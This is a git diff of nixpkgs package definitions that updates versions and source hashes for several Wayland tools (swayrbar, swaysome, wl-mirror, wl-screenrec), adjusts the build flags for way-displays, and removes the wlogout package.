a/nixpkgs/pkgs/tools/wayland/swayrbar/default.nix b/nixpkgs/pkgs/tools/wayland/swayrbar/default.nix index f8f085f1632b..db0095a973c3 100644 --- a/nixpkgs/pkgs/tools/wayland/swayrbar/default.nix +++ b/nixpkgs/pkgs/tools/wayland/swayrbar/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "swayrbar"; - version = "0.3.7"; + version = "0.3.8"; src = fetchFromSourcehut { owner = "~tsdh"; repo = "swayr"; rev = "swayrbar-${version}"; - sha256 = "sha256-41zlVT060Fu90N4oiZ6lWSZdJJSZjyk3GEA/u+bVNCI="; + sha256 = "sha256-pCXkgIesHqXI/m8ecytlq+U62lIrf7bOv95Hi/nyf/g="; }; - cargoHash = "sha256-/MUolnEdYlBTfmUB/j9vHaVpU63upeMoScjHl38cGjo="; + cargoHash = "sha256-RSdNYr6l9ayn9anczeGGh2rkKt6COqj+H71d14Gb8r0="; # don't build swayr buildAndTestSubdir = pname; diff --git a/nixpkgs/pkgs/tools/wayland/swaysome/default.nix b/nixpkgs/pkgs/tools/wayland/swaysome/default.nix index 308592e450f9..a4f042d99161 100644 --- a/nixpkgs/pkgs/tools/wayland/swaysome/default.nix +++ b/nixpkgs/pkgs/tools/wayland/swaysome/default.nix @@ -5,16 +5,16 @@ rustPlatform.buildRustPackage rec { pname = "swaysome"; - version = "2.1.0"; + version = "2.1.1"; src = fetchFromGitLab { owner = "hyask"; repo = pname; rev = version; - sha256 = "sha256-U5W/9VL1t1/R4ADPxseBV6CMKx04I4vbp7sFmSqRZXk="; + sha256 = "sha256-HRLMfpnqjDgkOIaH/7DxeYzoZn/0c0KUAmir8XIwesg="; }; - cargoHash = "sha256-QA3EQsYgjwx8QX50yaxiJyAPDlpYYqiqLiXco1kJmw0="; + cargoHash = "sha256-e5B90tIiXxuaRseok69EN4xuoRlCyiTVgEcAqvVg/dM="; meta = with lib; { description = "Helper to make sway behave more like awesomewm"; diff --git a/nixpkgs/pkgs/tools/wayland/way-displays/default.nix b/nixpkgs/pkgs/tools/wayland/way-displays/default.nix index 192e8aecc4fa..50ffefd1a6f9 100644 --- a/nixpkgs/pkgs/tools/wayland/way-displays/default.nix +++ b/nixpkgs/pkgs/tools/wayland/way-displays/default.nix @@ -31,7 +31,12 @@ stdenv.mkDerivation rec { libinput ]; - makeFlags = [ "DESTDIR=$(out) PREFIX= PREFIX_ETC= ROOT_ETC=$(out)/etc"]; + makeFlags = [ + "PREFIX=${placeholder "out"}" + "PREFIX_ETC=${placeholder "out"}" + "CC:=$(CC)" + "CXX:=$(CXX)" + ]; meta = with lib; { homepage = "https://github.com/alex-courtis/way-displays"; diff --git a/nixpkgs/pkgs/tools/wayland/wl-mirror/default.nix b/nixpkgs/pkgs/tools/wayland/wl-mirror/default.nix index 81be582a25e3..73355f0877d8 100644 --- a/nixpkgs/pkgs/tools/wayland/wl-mirror/default.nix +++ b/nixpkgs/pkgs/tools/wayland/wl-mirror/default.nix @@ -28,13 +28,13 @@ in stdenv.mkDerivation rec { pname = "wl-mirror"; - version = "0.16.1"; + version = "0.16.2"; src = fetchFromGitHub { owner = "Ferdi265"; repo = "wl-mirror"; rev = "v${version}"; - hash = "sha256-VUdmHJfbY1bA1/CeC8PJc+Xtupaz5a/15u4u3YGpxBA="; + hash = "sha256-srGqMqkkdJzcxN2sNToqDw/6B4OirlmKW1MXt1Nmvsk="; }; strictDeps = true; diff --git a/nixpkgs/pkgs/tools/wayland/wl-screenrec/default.nix b/nixpkgs/pkgs/tools/wayland/wl-screenrec/default.nix index c96a5834fa25..2836d7fed2bb 100644 --- a/nixpkgs/pkgs/tools/wayland/wl-screenrec/default.nix +++ b/nixpkgs/pkgs/tools/wayland/wl-screenrec/default.nix @@ -9,16 +9,16 @@ rustPlatform.buildRustPackage rec { pname = "wl-screenrec"; - version = "unstable-2023-09-17"; + version = "0.1.3"; src = fetchFromGitHub { owner = "russelltg"; repo = pname; - rev = "a36c5923009b44f2131196d8a3a234948f8e0102"; - hash = "sha256-V29eB9vozVKIBq8dO7zgA4nirsh1eDBjJN+rwVkeDLE="; + rev = "v${version}"; + hash = "sha256-ThPZPV1GyMFRu94O9WwUpXbR4gnIML26K7TyIfXZlcI="; }; - cargoHash = "sha256-uUfEweLWn/NdqgY8O7Ld+YnGPKQV1tpJi/Gd4MZB4xI="; + cargoHash = "sha256-DtlVsUFKNKXcwqNvGvqkSKUE+kRHX8wajL4fR0c9ZuQ="; nativeBuildInputs = [ pkg-config diff --git a/nixpkgs/pkgs/tools/wayland/wlogout/default.nix b/nixpkgs/pkgs/tools/wayland/wlogout/default.nix deleted file mode 100644 index 96cabcc38e87..000000000000 --- a/nixpkgs/pkgs/tools/wayland/wlogout/default.nix +++ /dev/null @@ -1,65 +0,0 @@ -{ lib -, stdenv -, fetchFromGitHub -, pkg-config -, meson -, ninja -, scdoc -, gtk3 -, libxkbcommon -, wayland -, wayland-protocols -, gtk-layer-shell -# gtk-layer-shell fails to cross-compile due to a hard dependency -# on gobject-introspection. -# Disable it when cross-compiling since it's an optional dependency. -# This disables transparency support. -, withGtkLayerShell ? (stdenv.buildPlatform == stdenv.hostPlatform) -}: - -stdenv.mkDerivation rec { - pname = "wlogout"; - version = "1.2"; - - src = fetchFromGitHub { - owner = "ArtsyMacaw"; - repo = "wlogout"; - rev = version; - hash = "sha256-xeTO8MBUrvcVA7WTRY7OhaVGInijuvXsVYEax8JmMZ0="; - }; - - strictDeps = true; - depsBuildBuild = [ pkg-config ]; - nativeBuildInputs = [ pkg-config meson ninja scdoc ]; - buildInputs = [ - gtk3 - libxkbcommon - wayland - wayland-protocols - ] ++ lib.optionals withGtkLayerShell [ - gtk-layer-shell - ]; - - postPatch = '' - substituteInPlace style.css \ - --replace "/usr/share/wlogout" "$out/share/${pname}" - - substituteInPlace main.c \ - --replace "/etc/wlogout" "$out/etc/${pname}" - ''; - - mesonFlags = [ - "--datadir=${placeholder "out"}/share" - "--sysconfdir=${placeholder "out"}/etc" - ]; - - meta = with lib; { - homepage = "https://github.com/ArtsyMacaw/wlogout"; - description = "A wayland based logout menu"; - license = licenses.mit; - maintainers = with maintainers; [ AndersonTorres ]; - platforms = platforms.linux; - mainProgram = "wlogout"; - }; -} -# TODO: shell completions |